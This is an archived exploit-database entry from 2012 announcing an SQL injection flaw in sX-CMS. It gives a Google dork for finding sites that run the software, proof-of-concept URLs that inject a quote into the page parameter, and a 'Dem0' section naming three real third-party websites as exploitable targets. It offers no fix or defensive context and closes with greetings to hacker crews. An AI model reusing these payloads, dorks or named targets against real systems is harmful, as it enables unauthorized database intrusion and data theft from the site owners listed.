sX-CMS SQL Injection

2012-04-06T00:00:00
ID PACKETSTORM:111625
Type packetstorm
Reporter Ryuzaki Lawlet
Modified 2012-04-06T00:00:00

Description

                                        
                                            `##################################################  
# Exploit Title: sX-CMS <= SQL injection Vulnerability  
# Date: 06/04/2012  
# Author: Ryuzaki Lawlet  
# Web/Blog: http://justryuz.blogspot.com  
# Category: webapps  
# version: -  
# Vendor or Software Link: http://www.source-worx.de/  
# Google dork: powered by sX-CMS  
# Tested on: Linux   
##################################################  
[~]Exploit/p0c :  
  
http://localhost:80/cms/index/page/_9'  
http://localhost:80/cms/index.php?page='9  
  
[~]Dem0 :  
  
http://www.general-aero.com/cms/cms/index/page/_9'  
http://www.naturel-europe.de/cms/index/page/_9'  
http://www.cycletec.de/cms/index.php?page=-9'  
  
  
FB : www.fb.me/justryuz  
+---------------------------------------------------+  
Greetz to :  
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]  
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC ]  
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]  
-----------------------------------------------------+  
  
CyberSEC © 2012 All rights reserved.  
`